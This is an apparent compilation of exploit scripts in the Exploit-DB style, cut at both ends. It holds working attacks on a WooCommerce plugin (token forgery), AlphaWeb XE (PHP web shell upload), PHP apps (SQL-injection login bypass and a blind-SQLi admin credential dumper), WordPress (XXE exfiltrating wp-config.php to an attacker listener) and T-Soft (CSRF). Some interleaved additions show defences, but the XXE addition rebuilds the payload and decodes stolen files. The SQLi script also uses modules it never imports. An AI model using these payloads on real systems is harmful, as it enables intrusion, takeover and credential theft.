			"Accept-Language": "en-US,en;q=0.9",
			"Connection": "close"
		}

		response = requests.get(url, headers=headers, cookies=cookies, timeout=5)
		if response.text == "":
			print(cmd + ": command not found\n")
		else:
			print(response.text)

if __name__ == '__main__':
	main()
            
# Exploit Title: WordPress Plugin WooCommerce Booster Plugin 5.4.3 - Authentication Bypass
# Date: 2021-09-16
# Exploit Author: Sebastian Kriesten (0xB455)
# Contact: https://twitter.com/0xB455
#
# Affected Plugin: Booster for WooCommerce
# Plugin Slug: woocommerce-jetpack
# Vulnerability disclosure: https://www.wordfence.com/blog/2021/08/critical=-authentication-bypass-vulnerability-patched-in-booster-for-woocommerce/
# Affected Versions: <= 5.4.3
# Fully Patched Version: >= 5.4.4
# CVE: CVE-2021-34646
# CVSS Score: 9.8 (Critical)
# Category: webapps
#
# 1:
# Go to: https://target.com/wp-json/wp/v2/users/
# Pick a user ID (e.g. 1, which is usually the admin)
#
# 2:
# Attack with: ./exploit_CVE-2021-34646.py https://target.com/ 1
#
# 3:
# Check which of the generated links lets you access the system
#
import requests,sys,hashlib
import argparse
import datetime
import email.utils
import calendar
import base64

B = "\033[94m"
W = "\033[97m"
R = "\033[91m"
RST = "\033[0;0m"

parser = argparse.ArgumentParser()
parser.add_argument("url", help="the base url")
parser.add_argument('id', type=int, help='the user id', default=1)
args = parser.parse_args()
id = str(args.id)
url = args.url
if args.url[-1] != "/": # URL needs trailing /
        url = url + "/"

verify_url= url + "?wcj_user_id=" + id
r = requests.get(verify_url)

if r.status_code != 200:
        print("status code != 200")
        print(r.headers)
        sys.exit(-1)

def email_time_to_timestamp(s):
    tt = email.utils.parsedate_tz(s)
    if tt is None: return None
    return calendar.timegm(tt) - tt[9]

date = r.headers["Date"]
unix = email_time_to_timestamp(date)

def printBanner():
    print(f"{W}Timestamp: {B}" + date)
    print(f"{W}Timestamp (unix): {B}" + str(unix) + f"{W}\n")
    print("We need to generate multiple timestamps in order to avoid delay related timing errors")
    print("One of the following links will log you in...\n")

printBanner()



for i in range(3): # We need to try multiple timestamps as we don't get the exact hash time and need to avoid delay related timing errors
        hash = hashlib.md5(str(unix-i).encode()).hexdigest()
        print(f"{W}#" + str(i) + f" link for hash {R}"+hash+f"{W}:")
        token='{"id":"'+ id +'","code":"'+hash+'"}'
        token = base64.b64encode(token.encode()).decode()
        token = token.rstrip("=") # remove trailing =
        link = url+"my-account/?wcj_verify_email="+token
        print(link + f"\n{RST}")
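The script above works because the verification code is the MD5 of the server's unix time, which the Date response header leaks. As an added example (not the plugin's code, before or after the patch), the weak scheme is reconstructed from the advisory and set beside a hardened token: random nonce, explicit expiry and an HMAC under a server-side secret, checked in constant time. `SECRET` is constructed here; a deployment loads it from configuration.

```python
import base64
import hashlib
import hmac
import json
import secrets

# Weak scheme, reconstructed from the advisory above: the code is the MD5 of
# the unix timestamp, so anyone who can read the Date header can rebuild the
# token for any user ID.
def weak_token(user_id, unix_ts):
    code = hashlib.md5(str(unix_ts).encode()).hexdigest()
    raw = json.dumps({"id": str(user_id), "code": code}, separators=(",", ":"))
    return base64.b64encode(raw.encode()).decode().rstrip("=")


def weak_token_rebuildable(user_id, observed_unix, token, skew=3):
    """True when the token can be reproduced from a timestamp observed within
    `skew` seconds of issue; this is the whole defect of the weak scheme."""
    return any(weak_token(user_id, observed_unix - i) == token for i in range(skew))


# Hardened scheme (added example). SECRET is constructed for the demo.
SECRET = secrets.token_bytes(32)


def _mac(user_id, nonce, exp):
    msg = f"{user_id}|{nonce}|{exp}".encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()


def issue_token(user_id, now, ttl=900):
    """Token bound to a random nonce and an expiry; nothing in it is guessable."""
    nonce = secrets.token_urlsafe(16)
    exp = now + ttl
    raw = json.dumps({"id": str(user_id), "nonce": nonce, "exp": exp,
                      "mac": _mac(user_id, nonce, exp)})
    return base64.urlsafe_b64encode(raw.encode()).decode().rstrip("=")


def _decode(token):
    padded = token + "=" * (-len(token) % 4)
    return json.loads(base64.urlsafe_b64decode(padded))


def verify_token(token, now):
    """Return the user ID the token vouches for, or None. The MAC is checked in
    constant time before any other field in the payload is trusted."""
    try:
        data = _decode(token)
        expected = _mac(data["id"], data["nonce"], int(data["exp"]))
        mac = str(data["mac"])
    except (ValueError, KeyError, TypeError):
        return None
    if not hmac.compare_digest(expected, mac):
        return None
    if int(data["exp"]) < now:
        return None
    # A production verifier also records the nonce so each token is single-use.
    return data["id"]


def swap_user_id(token, new_id):
    """Tamper helper for the test: rewrite the id field but keep the old MAC."""
    data = _decode(token)
    data["id"] = str(new_id)
    return base64.urlsafe_b64encode(json.dumps(data).encode()).decode().rstrip("=")
```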
            
# Exploit Title: AlphaWeb XE - File Upload Remote Code Execution (RCE) (Authenticated)
# Date: 09/09/2021
# Exploit Author: Ricardo Ruiz (@ricardojoserf)
# Vendor website: https://www.zenitel.com/
# Product website: https://wiki.zenitel.com/wiki/AlphaWeb
# Example: python3 CVE-2021-40845.py -u "http://$ip:80/" -c "whoami"
# Reference: https://github.com/ricardojoserf/CVE-2021-40845

import requests
import base64
import argparse

# Default credentials, change them if it is necessary
admin_user = "admin"
admin_pass = "alphaadmin"
scripter_user = "scripter"
scripter_pass = "alphascript"


def get_args():
	parser = argparse.ArgumentParser()
	parser.add_argument('-u', '--url', required=True, action='store', help='Target url')
	parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute')
	my_args = parser.parse_args()
	return my_args


def main():
	args = get_args()
	base_url = args.url
	url_main =   base_url + "/php/index.php"
	url_upload = base_url + "/php/script_uploads.php"

	command = args.command
	uploaded_file = "poc.php"
	url_cmd = base_url + "/cmd/" + uploaded_file + "?cmd=" + command

	login_authorization =  "Basic " + str(base64.b64encode((admin_user+':'+admin_pass).encode('ascii')).decode('ascii'))
	upload_authorization = "Basic " + str(base64.b64encode((scripter_user+":"+scripter_pass).encode('ascii')).decode('ascii'))

	headers_login = {
		"Authorization": login_authorization,
		"Cache-Control": "max-age=0"
	}

	headers_upload = {
		'Authorization': upload_authorization,
		'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="92"',
		'sec-ch-ua-mobile': '?0',
		'Upgrade-Insecure-Requests': '1',
		'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36',
		'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
		'Sec-Fetch-Site': 'same-origin',
		'Sec-Fetch-Mode': 'navigate',
		'Sec-Fetch-User': '?1',
		'Sec-Fetch-Dest': 'iframe',
		'Accept-Encoding': 'gzip, deflate',
		'Accept-Language': 'en-US,en;q=0.9',
	}

	files = {
		"userfile":(uploaded_file, "<?php if(isset($_REQUEST['cmd'])){ echo \"<pre>\"; $cmd = ($_REQUEST['cmd']); system($cmd); echo \"</pre>\"; die; }?>"),
	}

	s = requests.session()
	# Login as admin
	s.get(url_main, headers = headers_login)
	# Upload file
	upload = s.post(url_upload, files=files, headers = headers_upload)
	# Execute command
	cmd = s.post(url_cmd)
	print(cmd.text.replace("<pre>","").replace("</pre>",""))


if __name__ == "__main__":
    main()
            
# Exploit Title: Simple Attendance System 1.0 - Authenticated bypass
# Exploit Author: Abdullah Khawaja (hax.3xploit)
# Date: September 17, 2021
# Vendor Homepage: https://www.sourcecodester.com/php/14948/simple-attendance-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/attendance_0.zip
# Tested on: Linux, windows
# Vendor: oretnom23
# Version: v1.0

# Exploit Description:
Simple Attendance System is prone to multiple vulnerabilities.
An easy authentication bypass vulnerability in the application
allows the attacker to log in.


----- PoC: Authentication Bypass -----

Administration Panel: http://localhost/attendance/login.php

Username: admin' or ''=' -- -+
Password: admin' or ''=' -- -+


----- PoC-2: Authentication Bypass -----

Steps: 
1. Enter wrong credentials at http://localhost/attendance/login.php
2. Capture the request in burp and send it to repeater.
3. Forward the request.
4. In response tab, replace :
    {"status":"failed","msg":"Invalid username or password."}
                with
    {"status":"success","msg":"Login successfully."}
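The first PoC only works because the login query is assembled from the raw form fields. As an added example (not the application's code), here is that pattern beside its parameterized form, using an in-memory SQLite table as a constructed stand-in for the application's database, with the PoC string as the input:

```python
import hashlib
import sqlite3

# The username/password string from the PoC above.
PAYLOAD = "admin' or ''=' -- -+"


def _hash(password):
    # Unsalted digest only to keep the demo short; a real app uses a password KDF.
    return hashlib.sha256(password.encode()).hexdigest()


def make_db():
    """Constructed in-memory stand-in for the application's SQLite user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)",
                 ("admin", _hash("correct-horse")))
    return conn


def login_vulnerable(conn, username, password):
    """Query built by string interpolation, as an injectable login does. With the
    PoC payload the WHERE clause becomes
        username = 'admin' or ''=' -- -+' AND password = '<hash>'
    so the ''='...' literal swallows the closing quote and the OR branch is true
    for the admin row regardless of the password."""
    query = ("SELECT id, username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, _hash(password)))
    return conn.execute(query).fetchone()


def login_parameterized(conn, username, password):
    """Same lookup with bound parameters: the payload is compared as data only."""
    query = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, _hash(password))).fetchone()
```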
            
# Exploit Title: Library Management System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)
# Exploit Author: Bobby Cooke (@0xBoku) & Adeeb Shah (@hyd3sec)
# Date: 16/09/2021
# Vendor Homepage: https://www.sourcecodester.com/php/12469/library-management-system-using-php-mysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/librarymanagement.zip
# Vendor: breakthrough2
# Tested on: Kali Linux, Apache, Mysql
# Version: v1.0
# Exploit Description:
# Library Management System v1.0 suffers from an unauthenticated SQL Injection Vulnerability allowing remote attackers to dump the SQL database using a Blind SQL Injection attack.   
# Exploitation Walkthrough: https://0xboku.com/2021/09/14/0dayappsecBeginnerGuide.html
import requests,argparse
from colorama import (Fore as F, Back as B, Style as S)

BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT
def bullet(char,color):
    C=FB if color == 'B' else FR if color == 'R' else FG
    return SB+C+'['+ST+SB+char+SB+C+']'+ST+' '
info,err,ok = bullet('-','B'),bullet('!','R'),bullet('+','G')
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
proxies         = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}

# POST /LibraryManagement/fine-student.php
# inject' UNION SELECT IF(SUBSTRING(password,1,1) = '1',sleep(1),null) FROM admin WHERE adminId=1; -- kamahamaha
def sqliPayload(char,position,userid,column,table):
    sqli  = 'inject\' UNION SELECT IF(SUBSTRING('
    sqli += str(column)+','
    sqli += str(position)+',1) = \''
    sqli += str(char)+'\',sleep(1),null) FROM '
    sqli += str(table)+' WHERE adminId='
    sqli += str(userid)+'; -- kamahamaha'
    return sqli

chars = [ 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o',
          'p','q','r','s','t','u','v','w','x','y','z','A','B','C','D',
          'E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S',
          'T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7',
          '8','9','@','#']

def postRequest(URL,sqliReq,char,position,pxy):
    sqliURL = URL
    params = {"check":1,"id":sqliReq}
    # pxy is the proxy dict built by argsetup() from -p (or None); pass it through so
    # the chosen proxy is actually used instead of the hard-coded default above
    req = requests.post(url=sqliURL, data=params, verify=False, proxies=pxy or None, timeout=10)
    #print("{} : {}".format(char,req.elapsed.total_seconds()))
    return req.elapsed.total_seconds()

def theHarvester(target,CHARS,url,pxy):
    #print("Retrieving: {} {} {}".format(target['table'],target['column'],target['id']))
    position = 1
    theHarvest = ""
    while position < 8:   # recovers the first 7 characters only; raise the bound to dump longer values
        for char in CHARS:
            sqliReq = sqliPayload(char,position,target['id'],target['column'],target['table'])
            if postRequest(url,sqliReq,char,position,pxy) > 1:   # sleep(1) fired, so this character is right
                theHarvest += char
                break
        position += 1
    return theHarvest

class userObj:
    def __init__(self,username,password):
        self.username = username
        self.password = password

class tableSize:
    def __init__(self,sizeU,sizeP):
        self.sizeU = sizeU
        self.sizeP = sizeP
        self.uTitle = "Admin Usernames"+" "*(sizeU-15)+BR+" "+ST
        self.pTitle = "Admin Passwords"+" "*(sizeP-15)+BR+" "+ST
    def printHeader(self):
        width = self.sizeU+self.sizeP+3
        print(BR+" "*width+ST)
        print(self.uTitle,self.pTitle)
        print(BR+" "*width+ST)

def printTableRow(user,size):
    username = user.username
    unLen = len(username)
    if unLen < size.sizeU:
        username = username+(" "*(size.sizeU - unLen))
    else:
        username = username[:size.sizeU]
    username += BR+" "+ST
    password = user.password
    pLen = len(password)
    if pLen < size.sizeP:
        password = password+(" "*(size.sizeP - pLen))
    else:
        password = password[:size.sizeP]
    password  += BR+" "+ST
    print(username,password)


def sig():
    SIG  = SB+FY+"         .-----.._       ,--.\n"
    SIG += FY+"         |  ..    >  ___ |  | .--.\n"
    SIG += FY+"         |  |.'  ,'-'"+FR+"* *"+FY+"'-. |/  /__   __\n"
    SIG += FY+"         |      </ "+FR+"*  *  *"+FY+" \   /   \\/   \\\n"
    SIG += FY+"         |  |>   )  "+FR+" * *"+FY+"   /    \\        \\\n"
    SIG += FY+"         |____..- '-.._..-'_|\\___|._..\\___\\\n"
    SIG += FY+"             _______"+FR+"github.com/boku7"+FY+"_____\n"+ST
    return SIG

def argsetup():
    about  = SB+FT+'Unauthenticated Blind Time-Based SQL Injection Exploit - Library Manager'+ST
    parser = argparse.ArgumentParser(description=about)
    parser.add_argument('targetHost',type=str,help='The DNS routable target hostname. Example: "http://0xBoku.com"')
    parser.add_argument('DumpXAdmins',type=int,help='Number of admin credentials to dump. Example: 5')
    parser.add_argument('-p','--proxy',type=str,help='<127.0.0.1:8080> Proxy requests sent')
    args = parser.parse_args()
    if args.proxy:
        regex = r'^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}:[0-9]{2,5}$'
        if re.match(regex,args.proxy,re.IGNORECASE):
            # an intercepting proxy such as Burp listens on plain HTTP for both schemes
            args.proxy = {'http':'http://{}'.format(args.proxy),'https':'http://{}'.format(args.proxy)}
        else:
            print('{}Error:   Supplied proxy argument {} fails to match regex {}'.format(err,args.proxy,regex))
            print('{}Example: {} -p "127.0.0.1:8080"'.format(err,sys.argv[0]))
            sys.exit(-1)
    return args

if __name__ == "__main__":
    header = SB+FT+'               '+FR+' Bobby '+FR+'"'+FR+'boku'+FR+'"'+FR+' Cooke\n'+ST
    print(header)
    print(sig())
    args   = argsetup()
    host   = args.targetHost
    pxy    = args.proxy
    admins = args.DumpXAdmins
    PATH   = host+"/LibraryManagement/fine-student.php"
    size  = tableSize(20,20)
    size.printHeader()
    dumpnumber = 1
    while dumpnumber <= admins:
        adminUsername  = { "id":dumpnumber, "table":"admin", "column":"username"}
        adminUsername  = theHarvester(adminUsername,chars,PATH,pxy)
        adminPassword  = { "id":dumpnumber, "table":"admin", "column":"password"}
        adminPass = theHarvester(adminPassword,chars,PATH,pxy)
        adminUser = userObj(adminUsername,adminPass)
        printTableRow(adminUser,size)
        # print("Admin's Username is: {}".format(adminUsername))
        # print("Admin's Password is: {}".format(adminPass))
        dumpnumber += 1
            
# Exploit Title: WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated)
# Date: 16/09/2021
# Exploit Author: David Utón (M3n0sD0n4ld)
# Vendor Homepage: https://wordpress.com
# Affected Version: WordPress 5.6-5.7 & PHP8
# Tested on: Linux Ubuntu 18.04.5 LTS
# CVE : CVE-2021-29447

#!/bin/bash

# Author: @David_Uton (m3n0sd0n4ld)
# Usage: $./CVE-2021-29447.sh TARGET WP_USERNAME WP_PASSWORD PATH/FILE.EXT LHOST
# Example: $ ./CVE-2021-29447.sh 10.10.XX.XX wptest test ../wp-config.php 10.11.XX.XX


# Variables
rHost=$1
username=$2
password=$3
readFile=$4
lHost=$5

# Functions
# Logotype
logoType(){
	echo "
=====================================
CVE-2021-29447 - WordPress 5.6-5.7 - XXE & SSRF Within the Media Library (Authenticated)
-------------------------------------
@David_Uton (M3n0sD0n4ld)
https://m3n0sd0n4ld.github.io/
====================================="
}

# Create wav malicious
wavCreate(){
	echo -en "RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version='1.0'?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM 'http://$lHost:8000/xx3.dtd'>%remote;%init;%trick;]>\x00" > payload.wav && echo "[+] Create payload.wav"
}

# Create xx3.dtd
dtdCreate(){
cat <<EOT > xx3.dtd
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=$readFile">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://$lHost:8000/?p=%file;'>" >
EOT
}

# wav upload
wavUpload(){
cat <<EOT > .upload.py
#!/usr/bin/env python3

import requests, re, sys

postData = {
  'log':"$username",
  'pwd':"$password",
  'wp-submit':'Log In',
  'redirect_to':'http://$rHost/wp-admin/',
  'testcookie':1
}

# Stop at the 302: the auth cookies are set on that response, and if requests followed the
# redirect r.cookies would only hold whatever the final /wp-admin/ page sets.
r = requests.post('http://$rHost/wp-login.php',data=postData, verify=False, allow_redirects=False) # SSL == verify=True

cookies = r.cookies

print("[+] Getting Wp Nonce ... ")

res = requests.get('http://$rHost/wp-admin/media-new.php',cookies=cookies)
wp_nonce_list = re.findall(r'name="_wpnonce" value="(\w+)"',res.text)

if len(wp_nonce_list) == 0 :
  print("[-] Failed to retrieve the _wpnonce")
  exit(0)
else :
  wp_nonce = wp_nonce_list[0]
  print("[+] Wp Nonce retrieved successfully ! _wpnonce : " + wp_nonce)

print("[+] Uploading the wav file ... ")

postData = {
  'name': 'payload.wav',
  'action': 'upload-attachment',
  '_wpnonce': wp_nonce
}

wav = {'async-upload': ('payload.wav', open('payload.wav', 'rb'))}
r_upload = requests.post('http://$rHost/wp-admin/async-upload.php', data=postData, files=wav, cookies=cookies)
if r_upload.status_code == 200:
  image_id = re.findall(r'{"id":(\d+),',r_upload.text)[0]
  _wp_nonce=re.findall(r'"update":"(\w+)"',r_upload.text)[0]
  print('[+] Wav uploaded successfully')
else : 
  print("[-] Failed to receive a response for uploaded! Try again . \n")
  exit(0)
EOT
python3 .upload.py
}

# Server Sniffer
serverSniffer(){
	# background listener that serves xx3.dtd and logs the exfiltrated ?p= request
	python3 -m http.server 8000 &> http.server.log &
	echo $! > http.server.pid
}

# Load file and decoder
loadFile(){
	content="http.server.log"
	wavUpload

	while :
	do 
		if [[ -s $content ]]; then	
			echo "[+] Obtaining file information..."
			sleep 5s # Increase time if the server is slow
			
			base64=$(cat $content | grep -i '?p=' | cut -d '=' -f2- | cut -d ' ' -f1 | sort -u) # -f2- keeps the base64 '=' padding
			
			# Check file exists
			echo "<?php echo zlib_decode(base64_decode('$base64')); ?>" > decode.php
			sizeCheck=$(wc -c decode.php | awk '{printf $1}')
			if [[ $sizeCheck -gt "46" ]]; then
				php decode.php
			else 
				echo "[!] File does not exist or is not allowed to be read."
			fi
			break
		fi
	done
}

# Cleanup
cleanup(){
	kill $(cat http.server.pid) &>/dev/null
	rm http.server.log http.server.pid &>/dev/null
	rm xx3.dtd payload.wav .upload.py decode.php .cookies.tmp &>/dev/null
}


# Execute
logoType

# Checking parameters
if [[ $# -ne 5 ]];then
	echo "[!] Parameters are missing!!!"
	echo ""
	echo "$ ./CVE-2021-29447.sh TARGET WP_USERNAME WP_PASSWORD PATH/FILE.EXT LHOST"
else

	# Test Connection...
	echo "[*] Test connection to WordPress..."

	# WP Auth
	# No hard-coded Content-Length: curl computes it from the body, and a wrong fixed value breaks the request.
	authCheck=$(curl -i -s -k -X $'POST' \
    -H "Host: $rHost" -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H "Referer: http://$rHost/wp-login.php" -H $'Content-Type: application/x-www-form-urlencoded' -H "Origin: http://$rHost" -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
    -b $'wordpress_test_cookie=WP%20Cookie%20check' \
    --data-binary "log=$username&pwd=$password&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1" \
"http://$rHost/wp-login.php" > .cookies.tmp)

	auth=$(head -n 1  .cookies.tmp | awk '{ printf $2 }')

	# Running authentication with WordPress.

	if [[ $auth != "302" ]]; then
		echo "[-] Authentication failed ! Check username and password"
	else
		echo "[+] Authentication successful!!!"
	
		# Create wav & dtd file
		wavCreate
		dtdCreate
		serverSniffer
		loadFile
		cleanup
	fi
fi
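The script above writes payload.wav with fixed RIFF and iXML chunk lengths (0xb8 and 0x7b) and decodes the exfiltrated value with a throwaway decode.php. The following is an added example, my own code and not part of the advisory or of WordPress, that builds the same two files in Python with the chunk lengths computed from the payload, walks the result back to check it, and reverses the php://filter chain (base64, then raw deflate) without PHP. The listener address, the DTD name and the sample wp-config content are assumptions for the example.

```python
import base64
import struct
import zlib

# Assumed values for this example: the listener and DTD name mirror the bash PoC above.
LHOST = "10.11.0.1"
DTD_URL = f"http://{LHOST}:8000/xx3.dtd"


def xxe_xml(dtd_url: str) -> bytes:
    """The DOCTYPE the PoC embeds: a parameter entity that pulls the external DTD,
    which in turn defines %init; and %trick; (the out-of-band request)."""
    return (
        "<?xml version='1.0'?>"
        f"<!DOCTYPE ANY[<!ENTITY % remote SYSTEM '{dtd_url}'>%remote;%init;%trick;]>"
    ).encode()


def riff_chunk(fourcc: bytes, data: bytes) -> bytes:
    """One RIFF chunk: 4-byte id, little-endian 32-bit length, data, pad byte if odd."""
    assert len(fourcc) == 4
    return fourcc + struct.pack("<I", len(data)) + data + (b"\x00" if len(data) % 2 else b"")


def build_wav(xml: bytes) -> bytes:
    """A RIFF/WAVE container whose only chunk is iXML, the chunk getID3 hands to the
    XML parser.  Both lengths are computed, so any listener address stays consistent."""
    body = b"WAVE" + riff_chunk(b"iXML", xml)
    return b"RIFF" + struct.pack("<I", len(body)) + body


def parse_riff(blob: bytes) -> dict:
    """Minimal RIFF walker, used to verify what build_wav produced."""
    assert blob[:4] == b"RIFF"
    riff_len = struct.unpack_from("<I", blob, 4)[0]
    chunks, off = {}, 12
    while off + 8 <= 8 + riff_len:
        cid = blob[off:off + 4]
        clen = struct.unpack_from("<I", blob, off + 4)[0]
        chunks[cid] = blob[off + 8:off + 8 + clen]
        off += 8 + clen + (clen % 2)
    return {"riff_len": riff_len, "form": blob[8:12], "chunks": chunks}


def dtd_text(lhost: str, read_file: str) -> str:
    """xx3.dtd as the PoC writes it: php://filter deflates and base64-encodes the target
    file so it fits into a single URL query parameter."""
    return (
        f'<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource={read_file}">\n'
        f'<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM \'http://{lhost}:8000/?p=%file;\'>" >\n'
    )


def decode_exfil(p_value: str) -> bytes:
    """Reverse the filter chain: base64 (re-padded, in case the '=' was cut off the log
    line) and then raw deflate, wbits=-15, because zlib.deflate writes no zlib header."""
    raw = base64.b64decode(p_value + "=" * (-len(p_value) % 4))
    return zlib.decompress(raw, -15)


def encode_exfil(content: bytes) -> str:
    """What the target sends back for a given file, constructed here so the decoder can
    be exercised offline; mirrors zlib.deflate followed by convert.base64-encode."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(comp.compress(content) + comp.flush()).decode()


if __name__ == "__main__":
    wav = build_wav(xxe_xml(DTD_URL))
    with open("payload.wav", "wb") as f:
        f.write(wav)
    with open("xx3.dtd", "w") as f:
        f.write(dtd_text(LHOST, "../wp-config.php"))
    print(parse_riff(wav))
```

Run it in the directory the http.server listener serves from; the base64 value that shows up after `?p=` in its log is what decode_exfil() takes.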
            
# Exploit Title: T-Soft E-Commerce 4 - change 'admin credentials' Cross-Site Request Forgery (CSRF) 
# Exploit Author: Alperen Ergel
# Software Homepage: https://www.tsoft.com.tr/
# Version : v4
# Tested on: Kali Linux (2021.4) / XAMPP
# Category: WebApp
# Google Dork: intext:'T-Soft E-Ticaret Sistemleriyle Hazırlanmıştır.'
# Date: 2021-08-15
######## Description ########
#
# An attacker can change the admin's profile information (first name, last name, e-mail and phone)
# by luring a logged-in admin to a page that auto-submits the request below. The request carries
# no anti-CSRF token; the session cookie alone is enough.
#
######## Proof of Concept ########

POST /srv/service/admin/updateuserinfo HTTP/1.1
Host: localhost
Cookie: lang=tr; PHPSESSID=f2904b66de6c0e7ac0d4a9707b9f978c; rest1SupportUser=0; countryCode=TR; nocache=1; yayinlanmaDurumuPopup=1; yayinlanmaDurumuPopupTimeout=864000; webpush=1; U_TYPE_CK=131; U_TYPE_OK=c16a5320fa475530d9583c34fd356ef5; TSOFT_LOGGED=7d025a34d0526c8896d713159b0d1ffe; email=; phone=; password=
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 74
Origin: http://localhost
Referer: http://localhost/Y/
Te: trailers
Connection: close

firstName=Victim&lastName=victim&email=victim%40mail.com&phone=12584368595

####### EXPLOIT ##################
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://victimsite.com/srv/service/admin/updateuserinfo" method="POST">
      <input type="hidden" name="firstName" value="[CHANGEHERE]" />
      <input type="hidden" name="lastName" value="[CHANGEHERE]" />
      <input type="hidden" name="email" value="[CHANGEHERE]" />
      <input type="hidden" name="phone" value="[CHANGEHERE]" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
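The form above works because the endpoint trusts the session cookie alone. As an added example (my own code, not T-Soft's and not part of the advisory), here is a server-side guard that runs a request through the three checks any one of which would have rejected that form: Origin/Referer against the site's own origin, the X-Requested-With header the captured request already carries, and an anti-CSRF token compared in constant time. The site origin, the cookie names and the two constructed requests are assumptions for the example.

```python
import hmac
import secrets
from dataclasses import dataclass
from typing import Dict, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

SITE_ORIGIN = "https://shop.example"  # assumed origin of the T-Soft install


@dataclass
class Request:
    """Only the parts of an HTTP request the guard looks at (a constructed stand-in,
    not a framework object)."""
    method: str
    path: str
    headers: Dict[str, str]
    cookies: Dict[str, str]
    body: str = ""

    def header(self, name: str) -> Optional[str]:
        return {k.lower(): v for k, v in self.headers.items()}.get(name.lower())

    def form(self) -> Dict[str, str]:
        return {k: v[0] for k, v in parse_qs(self.body).items()}


def origin_of(url: str) -> str:
    u = urlsplit(url)
    return f"{u.scheme}://{u.netloc}"


def csrf_verdict(req: Request, site_origin: str) -> Tuple[bool, str]:
    """Three independent CSRF defences for a state-changing request.  Each one alone
    rejects the auto-submitting form; together they also cover browsers or proxies
    that strip Origin and Referer."""
    if req.method.upper() in ("GET", "HEAD", "OPTIONS"):
        return True, "safe method"
    # 1. Origin (or Referer) must be the site itself; a cross-site form carries the attacker's.
    src = req.header("Origin") or req.header("Referer")
    if src is None or origin_of(src) != site_origin:
        return False, f"origin mismatch: {src}"
    # 2. Custom header.  The captured request sends X-Requested-With; a plain HTML form
    #    cannot, and a cross-origin XHR that adds it triggers a CORS preflight the site
    #    does not answer.  The PoC working means the server never enforced this.
    if req.header("X-Requested-With") != "XMLHttpRequest":
        return False, "missing X-Requested-With"
    # 3. Anti-CSRF token in the body, compared in constant time with the session-bound one
    #    (double-submit cookie here; a server-side session lookup works the same way).
    expected = req.cookies.get("csrf_token")
    supplied = req.form().get("csrf_token")
    if not expected or not supplied or not hmac.compare_digest(expected, supplied):
        return False, "bad csrf token"
    return True, "ok"


TOKEN = secrets.token_hex(16)
SESSION = {"TSOFT_LOGGED": "7d025a34d0526c8896d713159b0d1ffe", "csrf_token": TOKEN}

# Constructed: what the PoC page's form produces when the victim's browser submits it.
POC_REQUEST = Request(
    method="POST", path="/srv/service/admin/updateuserinfo",
    headers={"Origin": "https://attacker.example", "Referer": "https://attacker.example/",
             "Content-Type": "application/x-www-form-urlencoded"},
    cookies=SESSION,
    body="firstName=Victim&lastName=victim&email=victim%40mail.com&phone=12584368595",
)

# Constructed: the same update issued by the admin panel's own XHR, token included.
LEGIT_REQUEST = Request(
    method="POST", path="/srv/service/admin/updateuserinfo",
    headers={"Origin": SITE_ORIGIN, "X-Requested-With": "XMLHttpRequest",
             "Content-Type": "application/x-www-form-urlencoded"},
    cookies=SESSION,
    body=f"firstName=Admin&lastName=User&email=admin%40shop.example&phone=1&csrf_token={TOKEN}",
)

if __name__ == "__main__":
    for label, r in (("PoC form post", POC_REQUEST), ("admin panel XHR", LEGIT_REQUEST)):
        print(f"{label}: {csrf_verdict(r, SITE_ORIGIN)}")
```

Setting the session cookie with SameSite=Lax or Strict is a fourth, browser-enforced layer; it is left out here because the guard only sees what arrives at the server.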
            
# Exploit Title: Church Management System 1.0 - 'search' SQL Injection (Unauthenticated)
# Exploit Author: Erwin Krazek (Nero)
# Date: 17/09/2021
